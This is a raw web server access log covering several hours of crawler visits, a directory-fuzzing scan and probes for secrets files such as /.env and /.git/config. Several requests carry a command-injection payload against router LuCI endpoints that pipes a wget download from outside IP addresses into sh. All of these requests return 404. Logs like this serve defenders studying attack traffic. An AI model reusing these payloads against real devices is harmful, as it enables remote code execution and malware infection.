156.59.198.136 - - [06/Nov/2024:01:16:06 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20181108095907.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [06/Nov/2024:01:20:07 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11548375.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.79 - - [06/Nov/2024:01:23:40 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
139.162.133.112 - - [06/Nov/2024:01:31:13 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.135 - - [06/Nov/2024:01:32:01 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/anchor.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.159 - - [06/Nov/2024:01:36:01 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
125.229.202.174 - - [06/Nov/2024:01:39:38 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
47.128.42.200 - - [06/Nov/2024:01:40:05 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.31.193 - - [06/Nov/2024:01:44:03 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.23.108.183 - - [06/Nov/2024:01:45:02 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0"
172.168.40.182 - - [06/Nov/2024:01:52:54 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.135 - - [06/Nov/2024:02:04:03 +0100] "GET /renault.activities.at/htdocs/export/xml/data/exportArticles_20231019095110.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.53.52 - - [06/Nov/2024:02:08:04 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:02:16:04 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11659844.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.249.48.232 - - [06/Nov/2024:02:18:32 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
156.59.198.136 - - [06/Nov/2024:02:20:05 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11646693.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:02:24:05 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20191010135248.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.215.236.240 - - [06/Nov/2024:02:28:29 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0"
156.59.198.135 - - [06/Nov/2024:02:38:47 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20180403155309.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:02:42:47 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11792552.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [06/Nov/2024:02:46:47 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/config/xml-toolbar/toolbar-wp.xml HTTP/1.0" 404 326 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:02:50:48 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12001813.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.220.1.88 - - [06/Nov/2024:02:50:52 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.136 - - [06/Nov/2024:02:54:48 +0100] "GET /renault.activities.at/htdocs/export/xml/data/articles/201910070803_RenArticle.xml HTTP/1.0" 404 331 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.248 - - [06/Nov/2024:02:56:56 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
179.43.191.98 - - [06/Nov/2024:03:01:26 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
147.185.133.219 - - [06/Nov/2024:03:06:21 +0100] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
31.220.1.88 - - [06/Nov/2024:03:20:09 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.135 - - [06/Nov/2024:03:47:29 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20151109122453.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /rest-api HTTP/1.1" 404 290 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /data HTTP/1.1" 404 286 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /blog HTTP/1.1" 404 287 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /client HTTP/1.1" 404 288 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /support HTTP/1.1" 404 288 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /login HTTP/1.1" 404 287 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /includes HTTP/1.1" 404 289 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /clientapi HTTP/1.1" 404 290 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /v3 HTTP/1.1" 404 286 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /admin HTTP/1.1" 404 287 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /v2 HTTP/1.1" 404 285 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /oauth HTTP/1.1" 404 287 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /api HTTP/1.1" 404 286 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /gate HTTP/1.1" 404 286 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /manage HTTP/1.1" 404 288 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /configuration HTTP/1.1" 404 293 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /env HTTP/1.1" 404 286 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /management HTTP/1.1" 404 290 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /..;/ HTTP/1.1" 404 286 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /actuator HTTP/1.1" 404 289 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /action HTTP/1.1" 404 287 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /abuse HTTP/1.1" 404 287 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /modules HTTP/1.1" 404 288 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /source HTTP/1.1" 404 288 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /software HTTP/1.1" 404 289 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /test HTTP/1.1" 404 286 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /system HTTP/1.1" 404 288 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /vault HTTP/1.1" 404 287 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /administrator HTTP/1.1" 404 293 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /staging HTTP/1.1" 404 289 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /latest HTTP/1.1" 404 287 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /v1 HTTP/1.1" 404 285 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /usr HTTP/1.1" 404 286 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /search HTTP/1.1" 404 287 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /activity HTTP/1.1" 404 290 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /internal HTTP/1.1" 404 289 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /admin-area HTTP/1.1" 404 290 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /manager HTTP/1.1" 404 289 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /.git/config HTTP/1.1" 404 292 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /signature HTTP/1.1" 404 290 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /doc HTTP/1.1" 404 286 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /security HTTP/1.1" 404 289 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /test HTTP/1.1" 404 286 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /static HTTP/1.1" 404 288 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /download HTTP/1.1" 404 289 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:56 +0100] "GET /config HTTP/1.1" 404 288 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /app HTTP/1.1" 404 286 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /ssl HTTP/1.1" 404 286 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /metrics HTTP/1.1" 404 288 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /signin HTTP/1.1" 404 288 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /tmp HTTP/1.1" 404 286 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /proxy HTTP/1.1" 404 288 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /heapdump HTTP/1.1" 404 289 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /schema HTTP/1.1" 404 287 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /var HTTP/1.1" 404 286 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /crypto HTTP/1.1" 404 288 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /web HTTP/1.1" 404 286 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /analytics HTTP/1.1" 404 290 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /java HTTP/1.1" 404 287 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /tests HTTP/1.1" 404 287 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /user HTTP/1.1" 404 286 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /about HTTP/1.1" 404 287 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /upload HTTP/1.1" 404 288 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /admin HTTP/1.1" 404 287 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /pricing HTTP/1.1" 404 289 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /dashboard HTTP/1.1" 404 290 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /gateway HTTP/1.1" 404 289 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:57 +0100] "GET /connector HTTP/1.1" 404 290 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:58 +0100] "GET /message-api HTTP/1.1" 404 292 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:58 +0100] "GET /project HTTP/1.1" 404 289 "-" "Fuzz Faster U Fool v1.1.0"
194.50.16.94 - - [06/Nov/2024:03:48:58 +0100] "GET /server HTTP/1.1" 404 285 "-" "Fuzz Faster U Fool v1.1.0"
139.162.164.247 - - [06/Nov/2024:03:55:38 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
5.8.11.202 - - [06/Nov/2024:03:56:29 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13"
45.156.128.45 - - [06/Nov/2024:04:18:23 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
92.255.57.58 - - [06/Nov/2024:04:18:45 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
31.220.1.88 - - [06/Nov/2024:04:20:13 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.136 - - [06/Nov/2024:04:20:55 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20210219114659.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:04:24:57 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20161219100843.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.79 - - [06/Nov/2024:04:25:50 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F45.202.35.24%2Ftplink+-O-%7C+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
178.215.238.67 - - [06/Nov/2024:04:28:20 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
156.59.198.136 - - [06/Nov/2024:04:28:55 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12478536.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:04:32:56 +0100] "GET /renault.activities.at/htdocs/export/xml/data/articles/202101180803_RenArticle.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:04:36:56 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11578727.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [06/Nov/2024:04:40:57 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/saveas.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
38.97.40.127 - - [06/Nov/2024:04:42:20 +0100] "GET http://httpbin.org/ip HTTP/1.1" 404 278 "-" "Go-http-client/1.1"
156.59.198.135 - - [06/Nov/2024:04:44:57 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/char.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
122.116.76.100 - - [06/Nov/2024:04:46:12 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.135 - - [06/Nov/2024:04:48:57 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12136278.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [06/Nov/2024:05:00:22 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.191.126.248 - - [06/Nov/2024:05:02:27 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.135 - - [06/Nov/2024:05:03:22 +0100] "GET /renault.activities.at/htdocs/export/xml/data/articles/201909111003_RenArticle.xml HTTP/1.0" 404 331 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
85.90.246.159 - - [06/Nov/2024:05:04:36 +0100] "POST /any HTTP/1.1" 404 279 "-" "Mozilla/5.0 zgrab/0.x"
87.120.114.229 - - [06/Nov/2024:05:07:36 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
156.59.198.136 - - [06/Nov/2024:05:11:20 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20140328095741.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:05:15:21 +0100] "GET /renault.activities.at/htdocs/export/xml/data/articles/202102110803_RenArticle.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [06/Nov/2024:05:18:15 +0100] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
109.194.248.203 - - [06/Nov/2024:05:27:48 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
156.59.198.136 - - [06/Nov/2024:05:28:05 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/save.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
172.105.64.178 - - [06/Nov/2024:05:39:30 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
178.215.238.67 - - [06/Nov/2024:05:40:38 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
185.191.126.248 - - [06/Nov/2024:05:43:10 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
184.105.139.70 - - [06/Nov/2024:05:46:32 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0"
31.220.1.88 - - [06/Nov/2024:05:47:18 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
184.105.139.70 - - [06/Nov/2024:05:49:48 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0"
184.105.139.70 - - [06/Nov/2024:05:50:22 +0100] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0"
87.121.86.55 - - [06/Nov/2024:05:51:25 +0100] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (X11; Linux x86_64)"
156.59.198.135 - - [06/Nov/2024:05:56:07 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/iframe.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:06:00:08 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/help.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:06:04:08 +0100] "GET /renault.activities.at/htdocs/export/xml/data/articles/201912191303_RenArticle.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.79 - - [06/Nov/2024:06:04:55 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F45.202.35.24%2Ftplink+-O-%7C+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.135 - - [06/Nov/2024:06:08:08 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/broff.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [06/Nov/2024:06:12:09 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20140204130458.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
